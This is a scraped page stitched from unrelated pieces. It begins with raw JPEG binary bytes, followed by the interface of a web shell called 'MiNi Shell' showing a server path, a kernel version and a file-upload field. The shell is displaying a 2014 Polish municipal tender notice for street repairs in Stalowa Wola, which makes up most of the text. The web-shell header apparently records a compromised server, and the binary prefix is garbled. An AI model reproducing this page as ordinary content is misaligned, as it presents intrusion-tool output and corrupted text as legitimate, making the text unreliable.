JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140624/211438-N-2014.html

<p class="kh_header"><b>Stalowa Wola: Remonty cząstkowe ulic w Stalowej Woli</b><br>
<b>Numer ogłoszenia: 211438 - 2014; data zamieszczenia: 24.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stalowa Wola , ul. Wolności 7, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 6433456, faks 015 6433412.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty cząstkowe ulic w Stalowej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest remont cząstkowy ulic miejskich o nawierzchni
bitumicznej w Stalowej Woli przy użyciu mieszanki mineralno bitumicznej /na
gorąco/ wytwarzanej w wytwórni mas bitumicznych, a w przypadku niesprzyjających
warunków atmosferycznych przy użyciu mieszanki mineralno - bitumicznej
wbudowywanej /na zimno/, wykonywania nakładek z mieszanki mineralno -
bitumicznej, mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym
wyrównaniu równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza
mas bitumicznych z zawałowaniem, wykonanie koryta wraz z podbudową z
kruszywa łamanego stabilizowanego mechanicznie gr 15 cm oraz położenia warstwy
rumoszu asfaltowego lub kruszywa drogowego o grubości 5 cm przy pomocy
rozściełacza mas bitumicznych z zawałowaniem (materiał inwestora),
przypowierzchniowa regulacja studzienek kanalizacji (studzienka rewizyjna, wpust
uliczny), rozbiórka chodników z płyt chodnikowych lub kostki betonowej z utylizacją
gruzu przez wykonawcę, ułożenie nowego chodnika z kostki betonowej na podsypce
cementowo - piaskowej oraz ułożenie krawężników i obrzeży, naprawa nawierzchni
z kostki kamiennej.
2. W trakcie obowiązywania umowy Zamawiający może dodatkowo zlecić pilne remonty,
zagrażające bezpieczeństwu ruchu pojazdów i pieszych. Remonty te muszą być
zrealizowane w dniu otrzymania ustnego zlecenia. W przypadku niemożności /z
przyczyn nieprzewidzianych - siła wyższa/ wykonania remontu w dniu zlecenia Wykonawca
zobowiązany jest do natychmiastowego odpowiedniego oznakowania i zabezpieczenia
ubytku oraz wykonania zlecenia natychmiast po ustaniu siły wyższej.
3. Szczegółowy zakres robót wg Szczegółowej Specyfikacji Technicznej
4. Przedmiot zamówienia w zakresie Częśc i Nr I obejmuje :
- Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy
użyciu mieszanki mineralno-bitumicznej /na gorąco/ wytwarzanej w wytwórni
mas bitumicznych.
- Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy
użyciu mieszanki mineralno - bitumicznej wbudowywanej /na zimno/.
- Wykonywanie nakładek z mieszanki mineralno - bitumicznej o gr. 5cm.
- Mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym wyrównaniem
równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza mas
bitumicznych z zawałowaniem.
- Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego mechanicznie
o gr 15 cm.
- Wykonanie przypowierzchniowej regulacji studzienek kanalizacji (studzienka rewizyjna,
wpust uliczny - w przypadku braku pierścienia odciążającego uzupełnić,
w przypadku uszkodzeń włazu lub wypustu należy wymienić na nowy) z rozebraniem
i odtworzeniem nawierzchni - Wykonanie warstwy rumoszu asfaltowego lub kruszywa drogowego o grubości 5
cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem (materiał Zamawiającego).
- Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej
Technologię robót określa:
- Szczegółowa Specyfikacja Techniczna D - 00.00. 00
- Szczegółowa Specyfikacja Techniczna D - 05.03.17
- Szczegółowa Specyfikacja Techniczna D - 05.03.11a
- Szczegółowa Specyfikacja Techniczna D - 04.01.01
- Szczegółowa Specyfikacja Techniczna D - 05.03.05.
- Szczegółowa Specyfikacja Techniczna D -04.04.00
- Szczegółowa Specyfikacja Techniczna D -03.02. 01.
- Szczegółowa Specyfikacja Techniczna D -03.02.01a
Wspólny słownik zamówień CPV:
- 45233142-6 - Roboty w zakresie naprawy dróg
- 45233140-2 - Roboty drogowe;
- 45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody
burzowej;
5. Przedmiot zamówienia w zakresie Części Nr I I obejmuje :
- Rozebranie starej nawierzchni chodnika z kostki brukowej wraz z ułożeniem nowej
o grubości 6 cm z kostki brukowej na podsypce cementowo-piaskowej,
- Rozebranie starej nawierzchni chodnika z płytek chodnikowych o wymiarach
50x50x7 lub 35x35x5 wraz z ułożeniem nowej o grubości 6 cm z kostki brukowej
na podsypce cementowo-piaskowej,
- Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego mechanicznie
o gr 15 cm,
- Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej,
- Rozebranie obrzeży betonowych wraz z ułożeniem nowych obrzeży gr. 8 cm na
ławie betonowej,
- Naprawa nawierzchni wykonanej z kostki kamiennej (materiały z odzysku),
- naprawa nawierzchni wykonanej z kostki brukowej -- betonowej (materiały z odzysku),
- Wykonanie nawierzchni z kostki kamiennej na podsypce cementowo-piaskowej.
Technologię robót określa:
- Szczegółowa Specyfikacja Techniczna D-01.02.04
- Szczegółowa Specyfikacja Techniczna D.05.03.23
- Szczegółowa Specyfikacja Techniczna D - 08.01.01
Wspólny słownik zamówień CPV:
- 45111100-9 - Roboty w zakresie burzenia
- 45233250-6 - Roboty w zakresie nawierzchni
- 45233252-0 - Roboty w zakresie nawierzchni ulic
6. Technologię robót określają Szczegółowe Specyfikacje Techniczne załączone do
SIWZ.
7. Dla Części II Zamówienia materiał z rozbiórki należy każdorazowo przekazać
Zamawiającemu lub na żądanie Zamawiającego zutylizować na własny koszt. Dla
Części I Zamówienia dla pozycji - Wykonanie warstwy rumoszu asfaltowego lub
kruszywa drogowego o grubości 5 cm przy pomocy rozściełacza mas bitumicznych z
zawałowaniem (materiał Zamawiającego), należy doliczyć koszty transportu z
miejsca składowania do miejsca wbudowania - realizacji przedmioty zamówienia.
8. Dla części I zamówienia zamawiający dopuszcza przygotowywanie ubytków
powierzchni asfaltowych tylko poprzez użycie frezarki mechanicznej.
9. Na wykonawcy spoczywa obowiązek opracowania i uzgodnienia projektów
tymczasowej organizacji ruchu na czas wykonywania robót remontowych.
10. Liczby podane w Rozdziale XV Specyfikacji Istotnych Warunków Zamówienia, są jedynie
przewidywanymi ilościami robót koniecznych do realizacji przedmiotu zamówienia,
oznacza to iż mogą ulec zmianie. Wprowadzone zostały w celu wyłonienia
najkorzystniejszej ekonomicznie oferty przetargowej.
11. W sytuacji gdy Zamawiający opisał przedmiot zamówienia przez wskazanie znaków
towarowych, patentów lub pochodzenia, to należy rozumieć, iż dopuszcza się
zastosowanie rozwiązań równoważnych.
12. Zamawiający dopuszcza zastosowanie równoważnych materiałów budowlanych,
wymienionych w Specyfikacji Istotnych Warunków Zamówienia i szczegółowych
specyfikacjach technicznych dla zadania: Remonty cząstkowe ulic w Stalowej Woli,
pod warunkiem, że materiały równoważne będą posiadały co najmniej takie same
parametry techniczne jak materiały wymienione w w/w dokumentach.
13. Na wykonawcy spoczywa obowiązek wykazania, iż oferowane dostawy (urządzenia i
materiały budowlane), usługi lub roboty budowlane spełniają wymagania
Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2, 45.23.21.30-2, 45.11.11.00-9, 45.23.32.50-6, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla części I zamówienia - warunek zostanie spełniony jeżeli wykonawca
wykaże, iż wykonał w okresie ostatnich 5 lat przed upływem terminu
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w
tym okresie, co najmniej 2 zadania odpowiadające swoim rodzajem robotom
stanowiącym przedmiot zamówienia tzn. robotom drogowym w zakresie
remontów lub budowy dróg o wartości minimum 800 000 zł brutto każde, co
winni potwierdzić dowodami czy roboty te zostały wykonane w sposób
należyty oraz czy zostały wykonane zgodnie z zasadami sztuki budowlanej i
prawidłowo ukończone;
- Dla części II zamówienia - warunek zostanie spełniony jeżeli wykonawca
wykaże, iż wykonał w okresie ostatnich 5 lat przed upływem terminu
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w
tym okresie, co najmniej 2 zadania odpowiadające swoim rodzajem
robotom stanowiącym przedmiot zamówienia o wartości minimum 100 000
zł brutto każde, co winni potwierdzić dowodami czy roboty te zostały
wykonane w sposób należyty oraz czy zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia - dysponuje lub będzie dysponował niezbędnymi
do wykonania zamówienia narzędziami i urządzeniami tj. co najmniej:
- wytwórnią stacjonarna (otaczarki) do wytwarzania mieszanek mineralno-asfaltowych,
- rozściełaczem masy bitumicznej,
- walcem statycznym stalowym,
- walcem drogowym ogumionym,
- skrapiarką do bitumu,
- samochodem samowyładowczym o ładowności min. 10 t.,
- koparką,
- frezarką drogową,
- zagęszczarką wibracyjną powierzchniową o ciężarze powyżej 500 kg,
- mechaniczną szczotką do zamiatania.
- Dla części II zamówienia - warunek zostanie pełniony jeżeli wykonawca
jeżeli wykonawca złoży oświadczenie na podstawie art. 22 ust. 1 ustawy
Prawo zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla części I zamówienia - dysponuje lub będzie dysponował kadrą
techniczną z uprawnieniami i kwalifikacjami z branży, która występuje przy
realizacji przedmiotu zamówienia tj. kierownikiem robót w branży drogowej,
- Dla części II zamówienia - dysponuje lub będzie dysponował kadrą
techniczną z uprawnieniami i kwalifikacjami z branży, która występuje przy
realizacji przedmiotu zamówienia tj. kierownikiem robót w branży budowlanej
lub drogowej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dla części I zamówienia - zostanie spełniony jeżeli wykonawca wykaże, iż
znajduje się w sytuacji finansowej zapewniającej wykonanie zamówienia tj.:
posiada własne środki finansowe lub zdolność kredytową zapewniającą
realizację zamówienia w wysokości minimum 800 000 zł;
- Dla części II zamówienia - zostanie spełniony jeżeli wykonawca wykaże, iż
znajduje się w sytuacji finansowej zapewniającej wykonanie zamówienia tj.:
posiada własne środki finansowe lub zdolność kredytową zapewniającą
realizację zamówienia w wysokości minimum 100 000 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na ofertę składają się następujące dokumenty i załączniki:
1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę;
2) Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy
z dnia 29.01.2004 r. Prawo zamówień publicznych - załącznik nr 4;
3) Parafowany wzór umowy - załącznik nr 6;
4) Zakres zamówienia powierzony podwykonawcom - załącznik nr 7;
5) Zobowiązanie innych podmiotów do oddania zasobów do dyspozycji wykonawcy
na okres korzystania z nich przy wykonywaniu zamówienia - wypełnić i złożyć
do oferty jeżeli dotyczy ( wraz z podaniem nazwy podwykonawcy w
przypadku w którym Wykonawca zamierza skorzystać z zasobów
podwykonawcy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazana jest istotna zmiana postanowień zawartej umowy w stosunku do treści oferty, na
podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy
1) zmiana dotycząca sposobu spełnienia świadczenia, w szczególności ze względu na:
a) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej
lub technicznej, bądź też w kosztorysie ofertowym Wykonawcy spowodowana zaprzestaniem
produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b) pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji, pozwalających
na zaoszczędzenie kosztów realizacji przedmiotu zamówienia lub kosztów eksploatacji
wykonanego przedmiotu zamówienia, zwiększenia bezpieczeństwa,
c) pojawienie się nowszej technologii wykonania przedmiotu zamówienia, pozwalającej na
zaoszczędzenie czasu realizacji zamówienia lub jego kosztów, jak również kosztów
eksploatacji wykonanego przedmiotu zamówienia,
d) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań
technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji
technicznej, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło
niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia;
e) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie
gruntu, kurzawka itp.), skutkujące niemożliwością zrealizowania przedmiotu umowy przy
dotychczasowych założeniach technologicznych;
